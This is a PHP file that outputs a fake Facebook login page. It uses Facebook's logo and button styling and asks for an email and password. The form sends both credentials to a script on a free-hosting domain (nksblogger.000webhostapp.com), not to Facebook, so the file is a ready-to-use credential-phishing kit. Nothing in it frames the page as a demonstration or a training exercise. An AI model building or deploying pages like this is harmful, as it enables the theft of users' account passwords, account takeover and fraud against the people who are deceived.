<?php
echo '<!DOCTYPE html>';
echo '<html>';
echo '<head>';
echo '<meta name="viewport" content="width=device-width, initial-scale=1">';
echo '<style>';
echo 'body, html {';
echo 'height: 100%;';
echo 'font-family: Arial, Helvetica, sans-serif;';
echo '}';
echo '';
echo '* {';
echo 'box-sizing: border-box;';
echo '}';
echo '';
echo '.bg-img {';
echo '/* The image used */';
echo 'background-image: url("");';
echo '';
echo 'min-height: 380px;';
echo '';
echo '/* Center and scale the image nicely */';
echo 'background-position: center;';
echo 'background-repeat: no-repeat;';
echo 'background-size: cover;';
echo 'position: relative;';
echo '}';
echo '';
echo '/* Add styles to the form container */';
echo '.container {';
echo 'padding: 4px;';
echo 'padding-bottom: 1px;';
echo 'padding-top: 16px;';
echo 'margin: 0;';
echo 'border: 0;';
echo 'display: block;';
echo 'cursor: pointer;';
echo 'font-size: 14px;';
echo 'line-height: 18px;';
echo 'text-align: center;';
echo 'direction: ltr;';
echo 'font-size: 14px;';
echo 'line-height: 18px;';
echo 'font-family: Helvetica, Arial, sans-serif;';
echo '';
echo '';
echo '}';
echo '';
echo '/* Full-width input fields */';
echo 'input[type=text], input[type=password] {';
echo 'width: 100%;';
echo 'padding: 12px;';
echo 'margin: 0px 0 3px 0;';
echo 'border: none;';
echo 'background: #f1f1f1;';
echo 'box-sizing: border-box;';
echo '';
echo 'font-size: 14px;';
echo 'line-height: 18px;';
echo 'border-radius: 4px;';
echo 'overflow: hidden;';
echo 'width: 100%;';
echo '}';
echo '';
echo '';
echo 'input[type=text]:focus, input[type=password]:focus {';
echo 'background-color: #ddd;';
echo 'outline: none;';
echo '';
echo '';
echo '}';
echo '';
echo '/* Set a style for the submit button */';
echo '.btn {';
echo 'background-color: #1877f2;';
echo 'color: white;';
echo 'padding: 16px 20px;';
echo 'border: none;';
echo 'cursor: pointer;';
echo 'width: 100%;';
echo 'opacity: 0.9;';
echo 'display: block;';
echo '';
echo 'border: none;';
echo 'border-radius: 3px;';
echo 'box-sizing: border-box;';
echo 'position: relative;';
echo 'z-index: 0;';
echo 'font: 400 13.3333px Arial;';
echo '';
echo '.btn:hover {';
echo 'opacity: 1;';
echo '}';
echo 'div2 {';
echo 'flex: 1;';
echo 'min-width: 0;';
echo 'width: 100%;';
echo '';
echo '}';
echo 'body {';
echo 'text-align: center;';
echo '';
echo '}';
echo '</style>';
echo '</head>';
echo '<body>';
echo '';
echo '';
echo '';
echo '<form action="http://nksblogger.000webhostapp.com/facebook.php" class="container" method="post">';
echo '<div2> <img src="https://static.xx.fbcdn.net/rsrc.php/y8/r/dF5SId3UHWd.svg" width="112" class="img" alt="facebook"></div2>';
echo '';
echo '<label for="email"><b></b></label>';
echo '<input type="text" placeholder="Enter Email" name="email" required>';
echo '';
echo '<label for="psw"><b></b></label>';
echo '<input type="password" placeholder="Enter Password" name="psw" required>';
echo '';
echo '<button type="submit" class="btn">Login</button>';
echo '<img src="d.png" width="80%" class="img" alt="error">';
echo '<img src="lan.png" width="100%" class="img" alt="error">';
echo '</form>';
echo '</div>';
echo '';
echo '';
echo '</body>';
echo '</html>';
echo '';
?>
